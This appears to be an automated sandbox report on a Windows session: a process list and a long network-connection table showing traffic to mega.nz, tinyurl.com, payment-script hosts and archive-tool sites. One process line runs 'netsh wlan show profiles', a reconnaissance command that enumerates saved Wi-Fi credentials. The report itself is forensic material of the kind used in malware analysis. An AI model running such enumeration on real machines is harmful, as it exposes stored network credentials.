"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.207 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.105 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ff6878888c0,0x7ff6878888cc,0x7ff6878888d8
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.207 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.105\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.105 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ff653c988c0,0x7ff653c988cc,0x7ff653c988d8
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k AppReadiness -p -s AppReadiness
C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe
"C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe" /InvokerPRAID: Microsoft.MicrosoftOfficeHub prelaunch
C:\Windows\system32\wwahost.exe
"C:\Windows\system32\wwahost.exe" -ServerName:Microsoft.MicrosoftOfficeHub.wwa
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzciIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QkVDOTVCOTQtRkJERS00OTU5LTg2RkItNTM1RTY2Q0NCNzBEfSIgdXNlcmlkPSJ7RUJEMzlEM0MtNjBDRC00QjhELTk4MkUtNUZDNUU3QTg2MzYyfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntCQkQyNDYwMy0xMzE3LTQyNjUtQTMyRS03MkJDMTUxMzA2ODF9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-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-PHBpbmcgcj0iMjAiIHJkPSI2MzI1IiBwaW5nX2ZyZXNobmVzcz0iezUyQ0QxQ0Y1LTIzMEYtNDQ4OS1BRUVBLTgwNjVBOEZBNDUzMn0iLz48L2FwcD48YXBwIGFwcGlkPSJ7NTZFQjE4RjgtQjAwOC00Q0JELUI2RDItOEM5N0ZFN0U5MDYyfSIgdmVyc2lvbj0iOTIuMC45MDIuNjciIG5leHR2ZXJzaW9uPSIxMjQuMC4yNDc4LjEwNSIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSIxOSIgaXNfcGlubmVkX3N5c3RlbT0idHJ1ZSIgbGFzdF9sYXVuY2hfY291bnQ9IjEiIGxhc3RfbGF1bmNoX3RpbWU9IjEzMzU4NjEwOTMyMTk1Njc3MCI-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-PHBpbmcgcj0iLTEiIHJkPSItMSIgcGluZ19mcmVzaG5lc3M9IntGRUQ0QzRFNi1BMUIzLTQ3NEYtOEMyMS1CMzRBMEI1NEMwNDB9Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Windows\SYSTEM32\cmd.exe
"cmd"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\uxdvyy.odt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| BE | 88.221.83.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.83.221.88.in-addr.arpa | udp |
| BE | 88.221.83.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.196:443 | www.google.com | udp |
| FR | 172.217.20.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 131.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| FR | 216.58.213.78:443 | clients2.google.com | udp |
| FR | 216.58.213.78:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 78.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| GB | 142.250.187.238:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | www.win-rar.com | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.68.195.51.in-addr.arpa | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.251.17.2.in-addr.arpa | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | zxx.groovesell.com | udp |
| US | 104.17.142.116:443 | zxx.groovesell.com | tcp |
| US | 104.17.142.116:443 | zxx.groovesell.com | tcp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | core.spreedly.com | udp |
| US | 8.8.8.8:53 | js.mollie.com | udp |
| US | 8.8.8.8:53 | js.stripe.com | udp |
| US | 8.8.8.8:53 | staxjs.staxpayments.com | udp |
| US | 8.8.8.8:53 | www.paypalobjects.com | udp |
| US | 8.8.8.8:53 | js.braintreegateway.com | udp |
| US | 8.8.8.8:53 | kit.fontawesome.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | js.authorize.net | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 104.18.40.68:443 | kit.fontawesome.com | tcp |
| US | 151.101.2.182:443 | core.spreedly.com | tcp |
| US | 151.101.0.176:443 | js.stripe.com | tcp |
| US | 151.101.0.176:443 | js.stripe.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| SE | 192.229.221.25:443 | js.braintreegateway.com | tcp |
| SE | 192.229.221.25:443 | js.braintreegateway.com | tcp |
| US | 34.111.145.109:443 | js.mollie.com | tcp |
| US | 104.18.17.199:443 | staxjs.staxpayments.com | tcp |
| US | 104.18.13.54:443 | js.authorize.net | tcp |
| SE | 192.229.221.25:443 | js.braintreegateway.com | tcp |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| US | 8.8.8.8:53 | ka-f.fontawesome.com | udp |
| US | 8.8.8.8:53 | 116.142.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.0.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.145.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.17.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.13.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.221.229.192.in-addr.arpa | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 104.21.26.223:443 | ka-f.fontawesome.com | tcp |
| US | 104.21.26.223:443 | ka-f.fontawesome.com | tcp |
| US | 104.21.26.223:443 | ka-f.fontawesome.com | tcp |
| US | 8.8.8.8:53 | t.paypal.com | udp |
| US | 151.101.1.35:443 | t.paypal.com | tcp |
| US | 8.8.8.8:53 | m.stripe.network | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 151.101.1.35:443 | t.paypal.com | tcp |
| US | 8.8.8.8:53 | v1.gdapis.com | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 172.67.200.87:443 | v1.gdapis.com | tcp |
| US | 8.8.8.8:53 | 21.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.26.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.200.67.172.in-addr.arpa | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| FR | 172.217.20.196:443 | www.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.196:443 | www.google.com | udp |
| FR | 172.217.20.196:443 | www.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.200.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 67.214.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| FR | 142.250.178.142:443 | www.youtube.com | tcp |
| FR | 142.250.178.142:443 | www.youtube.com | udp |
| GB | 142.250.200.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | www.7-zip.org | udp |
| DE | 49.12.202.237:443 | www.7-zip.org | tcp |
| DE | 49.12.202.237:443 | www.7-zip.org | tcp |
| US | 8.8.8.8:53 | 142.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| FR | 142.250.75.230:443 | static.doubleclick.net | tcp |
| FR | 172.217.20.170:443 | jnn-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | 237.202.12.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.75.250.142.in-addr.arpa | udp |
| FR | 216.58.213.78:443 | www.youtube.com | udp |
| FR | 216.58.213.78:443 | www.youtube.com | tcp |
| FR | 172.217.20.196:443 | www.google.com | udp |
| FR | 172.217.20.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| FR | 172.217.20.174:443 | play.google.com | udp |
| FR | 172.217.20.174:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 174.20.217.172.in-addr.arpa | udp |
| FR | 216.58.213.78:443 | www.youtube.com | udp |
| FR | 216.58.213.78:443 | www.youtube.com | tcp |
| GB | 142.250.200.22:443 | i.ytimg.com | udp |
| GB | 142.250.200.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 173.194.69.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 84.69.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| FR | 172.217.20.174:443 | play.google.com | udp |
| FR | 172.217.20.174:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.212.206:443 | consent.youtube.com | tcp |
| US | 8.8.8.8:53 | 206.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| FR | 216.58.214.162:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | rr2---sn-hgn7rn7r.googlevideo.com | udp |
| FR | 172.217.130.231:443 | rr2---sn-hgn7rn7r.googlevideo.com | tcp |
| FR | 172.217.130.231:443 | rr2---sn-hgn7rn7r.googlevideo.com | tcp |
| US | 8.8.8.8:53 | 162.214.58.216.in-addr.arpa | udp |
| FR | 172.217.130.231:443 | rr2---sn-hgn7rn7r.googlevideo.com | tcp |
| FR | 172.217.130.231:443 | rr2---sn-hgn7rn7r.googlevideo.com | tcp |
| FR | 172.217.130.231:443 | rr2---sn-hgn7rn7r.googlevideo.com | tcp |
| FR | 172.217.130.231:443 | rr2---sn-hgn7rn7r.googlevideo.com | tcp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| FR | 142.250.75.230:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 231.130.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | suggestqueries-clients6.youtube.com | udp |
| GB | 172.217.16.238:443 | suggestqueries-clients6.youtube.com | tcp |
| GB | 172.217.16.238:443 | suggestqueries-clients6.youtube.com | udp |
| GB | 172.217.16.238:443 | suggestqueries-clients6.youtube.com | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 142.250.200.46:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| FR | 172.217.20.193:443 | yt3.ggpht.com | tcp |
| FR | 172.217.20.193:443 | yt3.ggpht.com | tcp |
| FR | 172.217.20.193:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | 193.20.217.172.in-addr.arpa | udp |
| FR | 172.217.20.193:443 | yt3.ggpht.com | udp |
| US | 8.8.8.8:53 | rr5---sn-hpa7znzy.googlevideo.com | udp |
| IT | 173.194.10.10:443 | rr5---sn-hpa7znzy.googlevideo.com | tcp |
| IT | 173.194.10.6:443 | rr1---sn-hpa7znzy.googlevideo.com | tcp |
| US | 8.8.8.8:53 | 10.10.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.10.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr5---sn-hpa7knle.googlevideo.com | udp |
| IT | 173.194.18.74:443 | rr5---sn-hpa7knle.googlevideo.com | tcp |
| US | 8.8.8.8:53 | 74.18.194.173.in-addr.arpa | udp |
| IT | 173.194.18.74:443 | rr5---sn-hpa7knle.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr3---sn-hpa7kn7d.googlevideo.com | udp |
| IT | 74.125.99.168:443 | rr3---sn-hpa7kn7d.googlevideo.com | udp |
| US | 8.8.8.8:53 | 168.99.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr5---sn-hpa7znzr.googlevideo.com | udp |
| IT | 173.194.6.42:443 | rr5---sn-hpa7znzr.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr4---sn-hpa7znz6.googlevideo.com | udp |
| US | 8.8.8.8:53 | 42.6.194.173.in-addr.arpa | udp |
| IT | 74.125.111.105:443 | rr4---sn-hpa7znz6.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr1---sn-hpa7knl7.googlevideo.com | udp |
| IT | 74.125.11.70:443 | rr1---sn-hpa7knl7.googlevideo.com | udp |
| US | 8.8.8.8:53 | 105.111.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.11.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr1---sn-hpa7knll.googlevideo.com | udp |
| IT | 173.194.18.134:443 | rr1---sn-hpa7knll.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr3---sn-hpa7kn76.googlevideo.com | udp |
| IT | 74.125.99.136:443 | rr3---sn-hpa7kn76.googlevideo.com | udp |
| US | 8.8.8.8:53 | 134.18.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.99.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr3---sn-hpa7knle.googlevideo.com | udp |
| IT | 173.194.18.72:443 | rr3---sn-hpa7knle.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr3---sn-hpa7zns6.googlevideo.com | udp |
| IT | 173.194.182.168:443 | rr3---sn-hpa7zns6.googlevideo.com | udp |
| US | 8.8.8.8:53 | 72.18.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.182.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tinyurl.com | udp |
| US | 172.67.1.225:443 | tinyurl.com | tcp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | 225.1.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.145.216.31.in-addr.arpa | udp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| LU | 89.44.169.132:443 | eu.static.mega.co.nz | tcp |
| LU | 89.44.169.132:443 | eu.static.mega.co.nz | tcp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| LU | 66.203.125.14:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 132.169.44.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.125.203.66.in-addr.arpa | udp |
| LU | 89.44.169.132:443 | eu.static.mega.co.nz | tcp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| LU | 66.203.125.14:443 | g.api.mega.co.nz | tcp |
| N/A | 127.0.0.1:6341 | | tcp |
| N/A | 127.0.0.1:6341 | | tcp |
| N/A | 127.0.0.1:6341 | | tcp |
| N/A | 127.0.0.1:6341 | | tcp |
| US | 8.8.8.8:53 | gfs270n879.userstorage.mega.co.nz | udp |
| LU | 89.44.168.139:443 | gfs270n879.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 139.168.44.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gfs208n176.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs206n186.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs270n439.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs204n176.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs214n174.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs262n371.userstorage.mega.co.nz | udp |
| FR | 185.206.26.86:443 | gfs208n176.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.86:443 | gfs208n176.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.86:443 | gfs208n176.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.86:443 | gfs208n176.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.129:443 | gfs204n176.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.129:443 | gfs204n176.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.129:443 | gfs204n176.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.129:443 | gfs204n176.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| DE | 94.24.36.81:443 | gfs262n371.userstorage.mega.co.nz | tcp |
| DE | 94.24.36.81:443 | gfs262n371.userstorage.mega.co.nz | tcp |
| DE | 94.24.36.81:443 | gfs262n371.userstorage.mega.co.nz | tcp |
| DE | 94.24.36.81:443 | gfs262n371.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.96:443 | gfs206n186.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.96:443 | gfs206n186.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.96:443 | gfs206n186.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.96:443 | gfs206n186.userstorage.mega.co.nz | tcp |
| LU | 31.216.148.9:443 | gfs270n439.userstorage.mega.co.nz | tcp |
| LU | 31.216.148.9:443 | gfs270n439.userstorage.mega.co.nz | tcp |
| LU | 31.216.148.9:443 | gfs270n439.userstorage.mega.co.nz | tcp |
| LU | 31.216.148.9:443 | gfs270n439.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 86.26.206.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.24.206.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.36.24.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.37.24.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.148.216.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.27.206.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| NL | 173.194.69.84:443 | accounts.google.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| NL | 173.194.69.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.84:443 | gfs214n174.userstorage.mega.co.nz | tcp |
| FR | 216.58.214.162:443 | googleads.g.doubleclick.net | udp |
| FR | 142.250.178.142:443 | www.youtube.com | udp |
| FR | 142.250.178.142:443 | www.youtube.com | tcp |
| FR | 142.250.178.142:443 | www.youtube.com | tcp |
| NL | 173.194.69.84:443 | accounts.google.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| N/A | 127.0.0.1:6341 | | tcp |
| N/A | 127.0.0.1:6341 | | tcp |
| N/A | 127.0.0.1:6341 | | tcp |
| N/A | 127.0.0.1:6341 | | tcp |
| N/A | 127.0.0.1:6341 | | tcp |
| N/A | 127.0.0.1:6341 | | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| FR | 172.217.20.174:443 | play.google.com | udp |
| FR | 172.217.20.174:443 | play.google.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| FR | 216.58.213.78:443 | clients2.google.com | udp |
| FR | 216.58.213.78:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | www.rarlab.com | udp |
| DE | 51.195.68.162:443 | www.rarlab.com | tcp |
| DE | 51.195.68.162:443 | www.rarlab.com | tcp |
| US | 8.8.8.8:53 | 162.68.195.51.in-addr.arpa | udp |
| DE | 51.195.68.162:443 | www.rarlab.com | tcp |
| DE | 51.195.68.162:443 | www.rarlab.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| FR | 172.217.20.174:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 226.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| FR | 142.250.179.97:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | www.winzip.com | udp |
| NL | 23.194.209.160:443 | www.winzip.com | tcp |
| NL | 23.194.209.160:443 | www.winzip.com | tcp |
| US | 8.8.8.8:53 | 97.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.optimizely.com | udp |
| GB | 2.23.160.149:443 | cdn.optimizely.com | tcp |
| US | 8.8.8.8:53 | a25968344087.cdn.optimizely.com | udp |
| BE | 104.68.82.206:443 | a25968344087.cdn.optimizely.com | tcp |
| US | 8.8.8.8:53 | 160.209.194.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.160.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.214.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.82.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.clarity.ms | udp |
| US | 8.8.8.8:53 | unpkg.com | udp |
| US | 8.8.8.8:53 | installer.corel.com | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.17.246.203:443 | unpkg.com | tcp |
| US | 13.107.246.64:443 | www.clarity.ms | tcp |
| US | 107.23.42.175:443 | installer.corel.com | tcp |
| US | 104.19.178.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | www.corel.com | udp |
| NL | 23.194.209.160:443 | www.corel.com | tcp |
| US | 104.19.178.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | 52.178.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.42.23.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.246.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.246.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 8.8.8.8:53 | x.clarity.ms | udp |
| US | 104.18.32.137:443 | geolocation.onetrust.com | tcp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| US | 8.8.8.8:53 | download.winzip.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| NL | 23.62.61.176:443 | download.winzip.com | tcp |
| NL | 23.62.61.176:443 | download.winzip.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | 119.190.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.61.62.23.in-addr.arpa | udp |
